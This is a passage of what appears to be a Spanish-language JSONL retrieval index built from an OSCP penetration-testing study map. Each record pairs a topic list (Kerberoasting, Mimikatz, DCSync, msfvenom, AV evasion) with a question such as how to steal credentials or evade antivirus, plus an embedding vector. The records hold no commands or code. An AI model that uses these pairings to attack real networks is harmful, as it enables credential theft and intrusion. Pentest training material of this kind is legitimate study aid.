-0.01113, -0.00884, -0.0145, -0.04551, 0.00456, 0.06974, -0.00128, -0.0739, 0.03771, -0.00737, 0.02776, 0.05053, -0.05212, 0.07021, -0.07851, -0.00686, -0.0743, -0.00818, 0.04361, -0.00375, 0.0025, -0.00459, -0.02335, -0.02116, -0.03331, -0.0191, -0.03219, -0.00063, 0.01772, -0.0937, 0.00441, -0.08509, -0.08435, -0.0288, -0.04146, 0.00958, -0.03727, -0.02906, -0.01535, 0.0007, -0.03129, -0.01823, -0.07743, -0.02064, -0.02828, -0.03506, 0.01109, 0.06382, 0.07558, 0.0866, -0.01653, 0.04453, -0.01748, 0.01804, 0.02236, 0.05065, 0.07116, -0.05998, -0.03804, -0.08712, 0.07906, 0.0417, 0.0012, 0.00516, 0.00328, -0.02414, 0.0337, -0.06417, 0.00947, 0.00836, -0.01317, -0.03659, 0.04831, 0.05381, 0.049, 0.02026, 0.05567, 0.02115, -0.01126, 0.03196, 0.08392, -0.00924, 0.00844, -0.05768, -0.02869, -0.00868, 0.04525, 0.00537, -0.03694, -0.01318, -0.03232, -0.05462, -0.02911, -0.00128, -0.00273]} +{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### 🏰 Active Directory\n- Active Directory (Γ­ndice) Β· Kerberos Β· Kerberoasting Β· AS-REP Roasting\n- Mimikatz Β· Impacket Β· BloodHound\n- Pass-the-Hash Β· DCSync Β· Golden Ticket Β· Silver Ticket Β· secretsdump\n- Movimiento lateral Β· Pivoting ligolo-ng\n- GPP cpassword Β· LAPS Β· ACL abuses", "indexar": "ΒΏquΓ© herramientas puedo usar para robar credenciales?", "v": [-0.11807, -0.05303, -0.07579, -0.05771, 0.01983, -0.02012, 0.06058, 0.07769, -0.00391, -0.13938, -0.17212, -0.13221, 0.02762, -0.04919, 0.07024, 0.0764, -0.11244, 0.09, -0.02015, 0.01108, 0.01218, -0.05863, -0.09159, -0.02709, 0.00585, -0.00986, 0.0443, -0.03401, -0.14835, 0.08786, -0.04234, 0.013, 0.07271, -0.00949, -0.13581, -0.00276, -0.00106, -0.0037, 0.02235, 0.13909, 0.09831, 0.05, -0.07793, -0.04842, 0.1554, -0.00767, -0.06693, -0.02664, -0.07281, 0.15011, -0.01505, -0.16303, -0.08657, -0.08864, -0.00679, -0.08704, 0.16835, 0.00092, 0.04952, -0.11843, -0.10677, 0.00088, -0.07707, 0.0612, 0.00344, -0.12821, -0.01908, -0.06901, -0.0687, 0.09338, -0.07522, 0.02982, -0.01936, 0.10373, 0.02047, -0.02679, -0.01055, -0.00391, 0.05781, 0.02329, -0.0226, 0.04396, -0.02433, 0.01689, 0.01249, -0.02333, 0.16364, -0.02869, 0.00533, -0.05077, 0.01193, 0.11613, -0.03245, -0.05457, -0.03293, -0.04609, -0.01854, -0.00214, -0.06273, -0.02439, 0.07248, -0.11341, -0.02791, 0.10567, -0.10049, -0.01084, -0.0272, 0.03989, -0.03198, -0.11276, -0.05779, 0.01658, -0.06082, 0.04812, -0.00211, 0.10008, -0.00373, -0.09081, -0.05394, -0.08505, 0.11979, -0.04066, -0.00877, -0.02824, 0.10459, -0.04698, 0.02473, 0.09156, -0.08449, -0.11606, -0.01428, -0.02029, -0.00257, -0.01338, 0.02274, -0.03565, 0.01606, -0.17466, -0.0767, 0.0141, -0.01579, 0.01932, -0.10948, -0.03696, 0.02013, 0.03481, -0.00242, -0.04598, 0.02763, -0.10909, 0.04261, -0.01648, -0.03245, -0.00448, 0.02821, 0.01697, 0.06653, -0.05746, -0.128, -0.04235, -0.06062, -0.03959, 0.01748, -0.00141, -0.03553, -0.07178, 0.09341, 0.05553, -0.00847, 0.01544, 0.14162, 0.05115, 0.04283, -0.0297, 0.03605, -0.03005, 0.00838, -0.01257, -0.04899, -0.06737, 0.01266, 0.0673, -0.00457, 0.00962, 0.05339, 0.0377, 0.07045, 0.00403, -0.03849, 0.02172, -0.04416, -0.01962, 0.03062, -0.02537, 0.05008, 0.01493, 0.05532, 0.00623, -0.02513, 0.01291, -0.01323, 0.03281, -0.064, -0.02667, 0.1062, 5e-05, -0.03025, -0.03778, -0.01867, 0.02871, 0.02631, -0.00415, 0.06752, -0.07231, -0.02891, -0.0056, -0.08561, 0.07155, -0.05506, -0.07762, 0.0228, 0.03443, 0.00879, 0.01652, 0.03215, 0.0605, -0.0998, -0.03604, -0.03862, 0.00571, 0.03192, 0.00387, -0.0687, -0.03622, -0.04819, -0.09344, 0.00368, 0.02124, 0.02165, -0.00768, -0.07, 0.05918, -0.01951, -0.0188, -0.0878, 0.05804, -0.01764, 6e-05, -0.03863, -0.019, 0.05679, 0.031, -0.0106, -0.02599, -0.01071, 0.00571]} +{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### 🏰 Active Directory\n- Active Directory (Γ­ndice) Β· Kerberos Β· Kerberoasting Β· AS-REP Roasting\n- Mimikatz Β· Impacket Β· BloodHound\n- Pass-the-Hash Β· DCSync Β· Golden Ticket Β· Silver Ticket Β· secretsdump\n- Movimiento lateral Β· Pivoting ligolo-ng\n- GPP cpassword Β· LAPS Β· ACL abuses", "indexar": "con quΓ© programa monto un movimiento lateral en una red?", "v": [-0.04028, 0.05184, -0.08508, -0.13819, -0.22704, 0.06963, -0.09518, 0.05933, -0.11795, -0.14786, -0.0609, -0.06185, 0.07909, -0.04038, 0.13174, 0.01246, 0.07905, 0.00731, 0.01335, -0.06269, -0.0923, -0.11413, 0.05679, -0.07594, 0.1305, 0.11356, 0.04654, -0.01828, 0.03748, 0.00317, 0.03467, 0.01502, 0.05757, -0.05005, 0.0276, -0.02179, 0.13877, 0.04753, -0.01699, -0.00669, -0.13182, -0.02342, -0.08892, -0.02556, -0.02772, -0.06017, 0.03484, 0.01853, -0.04382, -0.01781, 0.08423, 0.0784, 0.01287, -0.13761, 0.01866, -0.10531, 0.03082, -0.05035, -0.06077, 0.00385, 0.04946, 0.08264, -0.01121, -0.00898, -0.0317, -0.07817, 0.02487, -0.06387, -0.0721, -0.03252, 0.03786, -0.00643, -0.06192, 0.11776, -0.03539, 0.15599, 0.03669, -0.11605, -0.00478, -0.06663, -0.11495, 0.11038, -0.00474, 0.08862, -0.05789, -0.12583, 0.06056, -0.08431, 0.03766, 0.04328, 0.04609, 0.03725, -0.01062, 0.04209, 0.00471, 0.05553, 0.00588, 0.03082, -0.07148, 0.0036, 0.01727, -0.0056, -0.10599, -0.03675, 0.06987, 0.03108, 0.07662, 0.01556, -0.00293, 0.05882, 0.07104, -0.01934, -0.0353, 0.01298, -0.02882, -0.02452, -0.09951, -0.00669, -0.03587, -0.02849, -0.0069, 0.05486, -0.12023, -0.06379, 0.04855, -0.09089, -0.07193, 0.09446, -0.13425, 0.05395, 0.0839, 0.02566, 0.00199, -0.13894, -0.08374, -0.08951, 0.08323, 0.03722, 0.10469, -0.03874, 0.01846, 0.04039, -0.02635, -0.0469, 0.02358, 0.1038, 0.07196, -0.02525, -0.05854, 0.12312, -0.05315, 0.07678, -0.00602, -0.01692, -0.04003, 0.05166, 0.01621, 0.00496, -0.11991, 0.05606, -0.02279, 0.02935, -0.05354, -0.0817, 0.03405, -0.10658, -0.00037, 0.04215, 0.05107, 0.03054, -0.04642, 0.05518, -0.02233, -0.0311, -0.00437, -0.02762, -0.06115, -0.06757, 0.05297, -0.0282, -0.05582, 0.06716, 0.07941, 0.00397, 0.02578, -0.06943, -0.00384, 0.00722, 0.04392, 0.04795, -0.02786, 0.00857, -0.02134, 0.00046, -0.01466, -0.0201, 0.00073, -0.01045, 0.10436, 0.01841, -0.08871, -0.01121, 0.01988, 0.01674, 0.03521, 0.07701, -0.03294, 0.08342, 0.04053, 0.11365, 0.00584, -0.01879, 0.09909, 0.05884, -0.06097, -0.01505, 0.00214, 0.05742, 0.00634, 0.0242, 0.08819, -0.01553, 0.04214, 0.06293, 0.00267, -0.04952, 0.04153, 0.02469, -0.04387, 0.05582, 0.02368, -0.01404, -0.02234, -0.02966, -0.00026, 0.00597, 0.09845, 0.02542, -0.03647, -0.05747, -0.01937, 0.04613, -0.03592, -0.04627, 0.00844, -0.03042, -0.05982, 0.07376, 0.05361, -0.02106, -0.00502, 0.02589, -0.0095, -0.08495, 0.06541, 0.02025]} +{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### 🏰 Active Directory\n- Active Directory (Γ­ndice) Β· Kerberos Β· Kerberoasting Β· AS-REP Roasting\n- Mimikatz Β· Impacket Β· BloodHound\n- Pass-the-Hash Β· DCSync Β· Golden Ticket Β· Silver Ticket Β· secretsdump\n- Movimiento lateral Β· Pivoting ligolo-ng\n- GPP cpassword Β· LAPS Β· ACL abuses", "indexar": "cual es una alternativa libre a mimikatz?", "v": [0.03379, 0.04882, -0.082, 0.08946, -0.117, 0.05752, -0.26235, 0.02314, -0.12461, -0.11842, 0.10247, -0.03193, 0.09617, 0.12162, 0.14278, -0.06539, 0.16642, 0.00191, 0.08758, -0.00202, 0.05329, -0.05952, -0.00754, -0.09378, -0.00469, -0.04486, 0.07295, 0.02699, -0.08781, 0.04056, -0.00351, 0.02771, 0.05751, -0.04025, 0.02394, 0.10947, 0.15763, -0.00591, 0.16623, -0.01138, -0.09422, -0.01463, -0.09762, 0.05435, -0.03252, -0.04652, -0.08565, 0.07083, -0.00026, 0.11913, -0.05074, -0.01919, 0.00401, 0.075, 0.10199, -0.081, 0.09799, -0.11253, -0.05278, -0.00603, -0.05673, 0.03652, -0.05454, -0.01278, -0.00381, 0.00553, -0.03789, -0.07015, -0.07474, 0.08731, 0.06391, -0.06019, 0.0334, -0.06494, -0.06528, 0.07272, -0.13831, -0.05923, -0.01837, -0.01303, 0.00138, -0.07018, -0.03102, 0.08515, -0.02985, -0.07617, 0.0651, -0.09756, -0.04895, 0.08687, 0.01909, 0.0223, 0.03973, 0.03629, -0.06486, -0.12494, -0.07165, 0.07316, 0.00845, 0.07799, 0.10597, 0.03632, -0.21836, -0.01993, -0.06597, 0.01213, -0.02053, -0.0491, -0.0277, 0.02658, -0.00722, 0.00629, -0.00897, -0.02126, -0.0155, 0.0272, 0.01806, 0.02415, 0.00688, -0.03243, -0.00984, 0.04578, -0.02186, -0.10255, -0.00959, 0.01124, -0.0004, 0.00068, -0.04569, 0.06892, 0.06777, -0.01179, -0.01461, -0.12087, -0.02747, -0.08133, 0.10621, -0.06732, 0.02487, -0.02996, -0.02058, -0.00263, 0.0279, -0.03653, 0.09336, -0.04977, 0.03969, -0.11466, 0.00206, -0.01993, -0.05785, 0.05645, 0.0517, 0.0888, 0.05947, 0.03653, -0.05002, 0.00153, -0.05552, 0.06263, 0.08109, -0.03838, 0.04424, 0.02262, 0.00433, -0.00609, -0.10257, -0.05781, -0.03622, -0.00518, 0.01326, 0.02926, 0.08827, 0.02623, 0.05105, 0.01497, -0.06638, -0.041, 0.02923, -0.07414, 0.029, 0.0336, -0.03226, -0.0225, 0.03678, -0.11159, -0.00316, 0.03706, 0.00126, 0.02104, -0.04014, -0.03972, -0.09097, -0.08747, -0.04145, -0.05994, 0.06236, -0.06919, 0.00711, -0.00987, 0.00948, -0.03007, 0.01587, -0.01034, -0.01488, 0.05718, -0.0388, 0.02395, 0.03781, -0.00078, 0.08566, 0.00096, 0.11117, 0.02108, 0.00896, 0.04119, -0.05929, -0.0612, 0.00326, -0.05144, 0.02496, 0.00226, 0.04576, 0.03912, -0.03975, 0.06496, 0.03892, 0.09654, -0.01143, 0.04506, -0.00124, -0.01068, 0.03849, -0.0109, 0.04276, -0.00195, 0.05681, -0.00836, 0.01261, -0.07236, 0.06242, 0.04657, -0.0564, -0.02617, -0.03022, 0.01814, -0.11499, 0.04356, -0.0026, -0.02802, 0.03019, 0.00454, 0.01591, 0.03366, 0.00894, -0.04585]} +{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### πŸ§ͺ Avanzado / Post-explotaciΓ³n\n- Buffer Overflow Β· Metasploit Β· msfvenom\n- Tunneling Β· Cracking de contraseΓ±as Β· Exploits conocidos\n- AV evasion Β· Client-side attacks", "indexar": "que programa sirve para crear payloads maliciosos?", "v": [-0.01971, 0.02551, -0.01209, -0.13046, 0.04931, -0.1302, 0.07267, -0.06841, -0.12167, -0.0365, -0.07328, -0.06808, 0.07777, -0.0534, -0.13597, 0.0274, -0.03892, -0.01559, 0.06771, 0.00645, 0.02344, 0.00053, -0.02027, -0.10515, -0.04436, 0.11223, -0.00761, -0.12487, -0.2508, 0.06172, 0.04412, 0.08742, 0.00614, -0.10719, 0.02343, -0.00435, 0.01355, 0.04489, -0.055, 0.12619, 0.03523, 0.02366, -0.08526, 0.08282, 0.05543, 0.02764, 0.09005, 0.05826, 0.04099, -0.02474, 0.08601, 0.08807, -0.05185, 0.1, 0.08073, -0.06744, 0.00054, -0.16542, -0.08908, 0.02548, -0.07533, 0.11292, 0.0081, -0.06089, 0.01087, -0.08988, 0.06629, 0.05366, -0.06793, -0.04034, 0.00258, -0.05877, 0.01106, 0.01582, 0.02487, 0.00682, -0.07813, 0.03429, 0.00263, 0.05504, 0.06791, -0.03459, -0.05538, 0.03129, -0.07017, -0.00239, 0.03827, 0.05364, 0.07489, -0.07158, 0.03292, 0.04525, -0.02212, 0.11507, 0.01095, 0.00831, 0.1682, -0.01547, 0.10592, 0.03538, 0.04703, -0.07714, 0.01457, 0.01183, 0.0462, 0.12138, 0.1272, -0.08608, -0.01908, 0.01249, 0.10119, -0.06137, 0.06982, -0.02567, -0.0838, -0.06788, -0.04816, 0.07445, 0.1064, -0.02017, -0.0482, 0.01292, -0.04166, 0.05322, 0.04545, -0.0628, -0.06126, 0.08411, 0.01623, 0.12406, -0.03541, 0.06102, -0.01337, -0.00766, -0.10279, -0.12833, 0.10483, -0.02794, -0.02658, -0.02824, 0.08206, 0.0957, 0.05857, 0.00181, -0.01198, 0.06091, 0.02817, -0.09316, -0.0224, 0.01608, 0.06559, 0.05953, -0.05777, 0.01452, -0.09454, -0.07913, 0.09069, 0.03747, -0.02082, 0.06015, -0.04072, 0.07041, -0.03721, -0.06006, 0.02065, -0.08638, -0.02327, 0.00415, 0.06731, 0.12031, -0.03264, 0.01701, 0.04589, -0.05533, 0.01381, -0.01139, -0.05074, -0.0739, 0.05835, -0.02717, -0.12086, -0.02393, 0.06975, 0.08894, -0.04054, -0.09636, -0.03368, 0.06208, 0.03776, 0.00828, 0.02081, 0.0239, -0.02323, -0.02724, -0.02754, -0.04609, -0.02961, -0.05096, 0.06968, -0.0058, 0.03442, -0.03029, -0.01263, 0.02245, -0.0161, 0.08415, -0.03446, 0.014, 0.06441, 0.09151, 0.07898, -0.05584, 0.06384, -0.02552, -0.04123, 0.01155, -0.02086, 0.033, 0.03511, 0.09709, -0.02935, -0.01113, 0.0262, 0.00283, 0.00267, 0.01042, 0.06101, 0.0496, 0.08782, 0.00839, -0.01517, 0.00154, -0.01389, -0.06191, 0.0275, -0.02844, -0.00522, -0.02364, -0.00477, -0.0364, 0.01463, 0.05542, -0.05097, -0.11357, -0.00942, -0.00127, 0.02578, 0.00582, -0.02902, -0.00845, 0.00442, 0.08462, 0.00338, -0.01001, 0.0722, 0.01871]} +{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### πŸ§ͺ Avanzado / Post-explotaciΓ³n\n- Buffer Overflow Β· Metasploit Β· msfvenom\n- Tunneling Β· Cracking de contraseΓ±as Β· Exploits conocidos\n- AV evasion Β· Client-side attacks", "indexar": "cΓ³mo se montan ataques de tΓΊnel en la red?", "v": [0.08373, -0.05785, -0.03319, -0.06646, -0.07194, 0.17781, -0.07253, 0.06866, 0.11061, 0.06731, -0.11619, 0.00596, 0.08444, 0.07943, -0.0238, 0.04087, -0.03887, -0.03069, 0.24734, -0.04085, -0.14507, -0.131, 0.00272, 0.0419, 0.12232, 0.05372, 0.00247, -0.03707, -0.00689, -0.16615, 0.0862, -0.07268, 0.02677, 0.07077, -0.04375, -0.03649, 0.03282, 0.12008, 0.02268, 0.02286, -0.11683, -0.10773, -0.207, -0.04474, 0.06971, -0.06638, -0.02214, -0.02545, 0.00201, -0.07421, 0.06072, 0.0006, -0.17082, -0.10977, 0.04645, -0.05879, 0.05545, 0.0154, 0.07906, -0.02059, 0.03036, 0.02919, -0.02316, 0.10609, 0.07133, -0.04519, 0.0283, -0.05051, -0.11365, -0.01131, 0.01019, -0.06372, -0.0755, 0.14231, -0.00535, 0.0051, 0.01048, 0.04247, 0.08711, 0.06028, 0.00354, 0.06512, -0.02625, 0.04759, -0.12243, -0.00733, -0.03703, -0.05306, -0.02086, -0.06205, -0.0535, -0.05138, 0.08575, 0.02683, 0.0623, -0.02546, -0.02035, -0.01488, -0.0331, -0.02566, -0.08359, 0.00149, -0.02334, 0.14148, 0.07608, 0.07325, -0.00243, -0.07843, 0.03386, -0.06043, -0.01931, 0.06493, -0.01605, -0.06768, -0.01283, -0.10089, 0.00316, 0.04982, -0.00957, -0.05409, -0.05268, 0.03391, -0.04459, 0.02247, -0.04367, -0.04451, -0.00459, 0.00644, 0.00806, -0.00811, -0.05514, 0.06844, 0.0448, -0.03552, -0.01087, 0.05528, -0.04056, -0.05128, 0.01979, 0.0064, 0.02599, 0.04686, -0.0458, -0.11614, 0.01901, 0.06929, -0.07084, -0.19407, -0.0532, 0.04993, 0.02057, -0.0196, -0.01439, -0.02127, 0.02051, -0.0677, 0.04485, -0.0102, -0.02594, 0.16032, 0.06998, 0.02101, -0.04384, -0.0073, -0.01246, -0.00603, 0.00329, 0.00195, 0.07834, -0.00518, -0.02079, 0.04972, -0.01135, -0.0122, 0.01566, -0.07446, -0.00568, -0.07697, 0.07279, -0.01184, 0.00604, -0.13048, -0.04127, 0.08861, 0.01024, -0.0871, 0.0911, -0.06947, 0.01889, 0.03596, -0.02882, -0.04973, 0.02515, 0.00574, 0.04158, -0.08395, -0.00852, -0.01904, 0.03789, -0.05691, -0.0117, -0.04947, -0.00222, -0.08668, -0.00975, 0.00265, -0.01536, -0.01963, -0.02078, 0.14505, 0.09523, -0.04072, 0.02126, -0.0267, -0.03711, -0.00883, 0.08738, 0.02893, -0.0257, -0.0193, 0.07243, 0.00934, 0.02035, 0.03957, -0.02661, -0.00878, -0.0494, -0.06943, -0.0741, 0.03098, 0.01244, -0.01003, -0.08256, -0.00814, 0.03875, -0.00207, 0.05029, 0.08533, -0.01196, -0.00339, 0.01358, 0.05421, 0.01947, 0.00898, -0.06857, -0.01278, -0.03493, 0.02646, -0.00779, -0.02978, 0.00733, 0.00542, -0.02888, -0.01733, 0.04297, -0.03212]} +{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### πŸ§ͺ Avanzado / Post-explotaciΓ³n\n- Buffer Overflow Β· Metasploit Β· msfvenom\n- Tunneling Β· Cracking de contraseΓ±as Β· Exploits conocidos\n- AV evasion Β· Client-side attacks", "indexar": "hay alguna herramienta para eludir los antivirus desde el cliente?", "v": [-0.12443, 0.04926, -0.08577, -0.12743, -0.07153, -0.05971, -0.04798, -0.00715, -0.16331, -0.05445, -0.0464, -0.20717, -0.02017, 0.02186, 0.13254, -0.04101, 0.08069, -0.16875, 0.068, 0.10792, -0.00986, 0.0447, -0.1423, 0.02374, -0.15665, 0.02916, 0.0672, 0.00488, -0.15208, 0.10962, 0.01244, 0.01478, -0.00103, -0.04037, -0.08122, -0.05192, -0.04162, 0.0657, 0.0463, 0.05296, 0.10877, -0.0365, 0.00575, 0.01416, 0.00968, 0.01308, -0.00775, -0.073, 0.07736, 0.08429, -0.10815, -0.13876, -0.08429, -0.06611, 0.05869, -0.11702, 0.0666, -0.08767, 0.1625, -0.1596, -0.089, 0.16429, -0.07014, 0.05454, -0.01503, -0.09788, 0.00723, -0.13168, -0.04018, 0.05808, -0.09653, 0.0522, 0.01516, -0.01152, -0.01856, -0.09696, 0.0543, 0.045, 0.0606, -0.01161, 0.04492, 0.03696, -0.05992, -0.05543, -0.08395, -0.08071, 0.02402, -0.01649, -0.05637, -0.08024, -0.01755, 0.05584, -0.01595, 0.08965, -0.02262, -0.04245, 0.0938, -0.06219, -0.03359, -0.05129, 0.08688, -0.0619, -0.09255, 0.06457, -0.01422, -0.08269, -0.05145, -0.03928, -0.15436, 0.02847, 0.00088, 0.01376, 0.01892, -0.01237, -0.035, -0.02324, 0.02123, -0.0968, 0.06605, -0.05099, -0.01604, 0.06835, -0.09869, 0.05277, -0.01933, -0.00247, -0.05525, 0.10304, -0.03089, -0.12052, 0.02929, -0.09367, -0.07389, 0.03569, -0.03771, 0.02739, 0.02774, -0.13447, -0.07402, -0.01413, 0.01136, 0.02866, -0.06339, -0.01034, 0.036, -0.03129, -0.03628, -0.04948, -0.07605, 0.0367, 0.07484, -0.00594, -0.02656, 0.02431, -0.00296, 0.0751, -0.06944, -0.00846, 0.05404, -0.00769, -0.03034, 0.0, 0.12002, -0.02292, 0.02047, -0.04899, 0.01817, 0.00627, 0.02112, 0.09556, 0.01431, -0.004, 0.05831, -0.08815, -0.00752, -0.03245, -0.00489, -0.03166, -0.00963, -0.08015, 0.03292, -0.02078, -0.01599, -0.00419, 0.03952, -0.05265, -0.00563, 0.0347, -0.00893, -0.00256, -0.03266, 0.05149, -0.08304, -0.02625, 0.02923, -0.03235, -0.03113, -0.09548, 0.01534, 0.02546, -0.05066, -0.04192, -0.00621, -0.01162, 0.06407, 0.10103, 0.00685, 0.00713, 0.04161, 0.06245, 0.0367, -0.02775, -0.03318, 0.02347, -0.01633, -0.01993, 0.00484, 0.02661, 0.01341, 0.00659, 0.04346, -0.02582, 0.02315, -0.04186, -0.06105, 0.03146, -0.02229, 0.03486, 0.04747, -0.01187, 0.01142, -0.06707, 0.03256, -0.06114, 0.00295, -0.00763, 0.05227, -0.0568, -0.02263, -0.01914, -0.04498, 0.01879, 0.05078, -0.05115, -0.03689, 0.02727, 0.01604, -0.02741, -0.02557, -0.06699, -0.01067, -0.01672, -0.01103, 0.00051, 0.0171, 0.01061]} +{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### ⌨️ Cheatsheets de shell\n- Operadores Bash Β· Operadores PowerShell\n- Port scanner PowerShell Β· Bucles bash sobre IPs", "indexar": "quΓ© herramienta sirve para hacer un port scanning con PowerShell?", "v": [0.05966, -0.00277, -0.1632, -0.15467, -0.01669, -0.16759, -0.0377, -0.1389, 0.06833, -0.05511, -0.16741, 0.06673, -0.00646, -0.13658, 0.00071, 0.0997, -0.00599, -0.07761, -0.03393, 0.11114, -0.06893, 0.03061, -0.14079, -0.09486, 0.0006, 0.03744, 0.02819, 0.08071, -0.23284, 0.06438, -0.04202, 0.01537, 0.05367, -0.0884, -0.12357, -0.09316, -0.03154, 0.08257, 0.10393, 0.19297, -0.08354, 0.10592, -0.08485, 0.0249, 0.03235, -0.01386, -0.02507, -0.04194, -0.00254, 0.07005, -0.12543, -0.11912, -0.08686, 0.05697, 0.01906, -0.13569, 0.05476, -0.06936, 0.0199, -0.17096, -0.09564, 0.05846, -0.09812, -0.04681, -0.02591, -0.06562, -0.05958, -0.06848, -0.10474, 0.0115, -0.1303, 0.01702, 0.02123, -0.03284, -0.02131, -0.06592, 0.01354, 0.07673, 0.08519, -0.02809, 0.04173, -0.02308, -0.12247, -0.07506, -0.08041, -0.06896, -0.02138, -0.00422, -0.01598, -0.07947, -0.0191, 0.00062, -0.02197, 0.06865, 0.05622, 0.056, 0.03727, -0.02385, -0.00524, 0.01659, 0.14935, -0.10707, -0.14483, 0.04944, 0.01042, -0.01264, -0.04306, -0.04651, -0.07209, -0.03246, 0.01886, 0.02404, 0.00247, -0.03721, -0.05951, 0.00702, -0.0378, -0.09344, -0.0381, -0.0039, 0.03646, -0.0143, -0.00641, -0.00196, 0.02905, -0.00721, -0.00161, 0.09718, 0.01819, -0.05373, 0.02358, -0.03934, -0.08548, -0.01286, -0.05335, -0.08424, -0.01868, -0.17101, -0.02313, -0.04235, -0.00997, 0.07357, -0.01963, -0.06041, 0.03745, -0.04185, 0.0368, 0.00215, -0.03958, 0.0344, 0.02268, 0.00302, -0.0225, 0.07779, -0.02798, -0.0145, 0.02399, -0.03291, -0.09978, 0.02123, -0.05328, -0.02253, 0.05496, 0.03269, -0.00075, -0.02154, -0.06197, -0.02737, 0.05625, -0.01625, 0.01577, 0.08258, -0.02073, -0.04064, 0.01456, -0.03784, -0.00624, -0.00499, -0.00191, -0.08149, -0.03136, 0.04052, 0.0038, -0.02643, 0.02144, -0.00771, 0.02973, -0.08602, 0.03775, 0.02246, 0.02321, 0.03021, -0.01258, -0.05683, 0.0344, -0.0194, 0.00206, -0.03958, 0.05307, -0.04803, -0.04463, -0.01571, -0.01859, -0.04342, 0.05536, 0.08989, -0.05208, -0.00323, -0.03967, 0.00469, 0.01143, 0.00777, 0.07813, -0.00281, -0.06979, -0.0114, 0.02571, -0.00995, -0.03367, 0.04565, -0.00638, -0.01189, 0.00097, 0.02617, 0.03624, 0.05685, 0.06866, -0.00443, 0.03488, 0.02777, 0.04661, 0.06545, -0.05002, -0.01997, 0.00933, -0.01478, 0.01276, 0.01455, -0.05048, -0.07293, 0.00313, -0.0025, 0.00975, 0.01483, -0.02593, -0.0298, -0.02086, 0.02178, -0.01185, -0.08943, -0.04235, 0.0123, 0.09308, -0.02653, 0.03892, -0.05245]} +{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### ⌨️ Cheatsheets de shell\n- Operadores Bash Β· Operadores PowerShell\n- Port scanner PowerShell Β· Bucles bash sobre IPs", "indexar": "cual es una alternativa libre a los cheatsheets de Bash?", "v": [-0.11101, 0.01957, -0.03066, 0.10383, -0.07116, -0.01506, -0.03942, -0.04912, -0.13454, -0.00116, -0.12375, -0.01466, -0.15886, 0.11219, 0.10819, -0.07798, 0.00127, 0.01232, 0.07209, -0.05414, 0.02461, -0.10548, -0.05778, 0.04292, -0.07374, -0.01877, 0.01826, 0.10016, -0.15437, 0.10775, -0.05491, -0.01657, 0.0217, 0.05689, 0.04416, 0.07951, 0.04434, 0.02107, 0.06396, -0.05316, 0.05664, -0.09741, -0.1312, 0.16014, 0.08241, -0.15024, -0.09939, 0.10158, 0.03827, 0.01279, -0.05397, 0.02857, -0.07404, 0.04887, 0.1289, -0.08724, 0.17893, -0.06824, -0.14166, 0.012, -0.07239, -0.03157, 0.05289, -0.02395, 0.03772, 0.04379, -0.10614, -0.07744, -0.04133, 0.02928, 0.03231, 0.0329, -0.03359, 0.02401, -0.16402, 0.09473, -0.11143, 0.03334, -0.02551, 0.04109, -0.04909, -0.12513, -0.03663, 0.11343, -0.03897, -0.00929, 0.11625, -0.08529, -0.00074, 0.0559, 0.11309, 0.02824, 0.07434, 0.10774, -0.03261, -0.1414, 0.0266, 0.08915, -0.02051, 0.01273, 0.00866, 0.00808, -0.09319, 0.03445, 0.02574, 0.01457, -0.00721, 0.03426, -0.04614, 0.0535, 0.048, 0.03143, 0.04875, 0.02295, 0.05411, -0.05566, -0.01685, 0.02583, -0.01901, 0.01935, -0.06495, -0.06099, -0.02884, -0.06461, 0.05047, 0.04336, 0.01148, 0.06634, -0.06994, 0.10767, 0.06335, 0.01519, -0.06297, -0.05199, -0.09382, -0.03486, 0.08713, -0.03937, -0.0276, -0.0346, 0.05926, 0.0577, 0.04247, 0.00724, 0.01848, -0.05385, 0.01067, -0.05232, -4e-05, -0.05012, -0.02122, 0.01969, 0.00755, 0.12643, -0.0433, 0.06296, -0.01911, -0.05665, -0.0374, 0.07527, 0.01411, -0.01206, 0.01108, 0.03931, 0.00715, -0.04678, 0.00431, -0.10385, -0.04414, 0.05132, -0.0036, 0.03961, 0.04894, -0.07451, 0.03139, -0.08723, -0.00477, -0.11511, 0.04239, -0.09264, 0.00905, 0.0186, -0.04193, -0.01956, -0.04482, -0.02165, 0.00132, 0.02558, 0.05525, 0.00553, 0.0029, 0.04642, -0.05883, -0.07834, -0.05339, 0.0217, -0.00765, -0.12413, 0.04296, -0.03639, -0.0791, 0.02062, -0.0043, -0.06582, 0.01599, 0.01329, -0.06379, -0.00258, -0.02261, 0.06383, 0.03111, -0.02637, 0.06292, 0.01639, -0.06864, -0.011, 0.06476, -0.06459, -0.02538, 0.01955, 0.06751, 0.04611, 0.0593, -0.02621, -0.02441, 0.0266, 0.05634, 0.08318, -0.00727, 0.05279, -0.02594, -0.00263, -0.01537, -0.0054, 0.01974, 0.0272, 0.06289, 0.00468, -0.01208, -0.04567, 0.08475, 0.07494, 0.01625, -0.06065, -0.03289, 0.00243, -0.09237, -0.00532, -0.01131, -0.08563, -0.00619, 0.03253, 0.00895, -0.01546, 0.0381, -0.05204]} +{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### ⌨️ Cheatsheets de shell\n- Operadores Bash Β· Operadores PowerShell\n- Port scanner PowerShell Β· Bucles bash sobre IPs", "indexar": "con quΓ© puedo montar 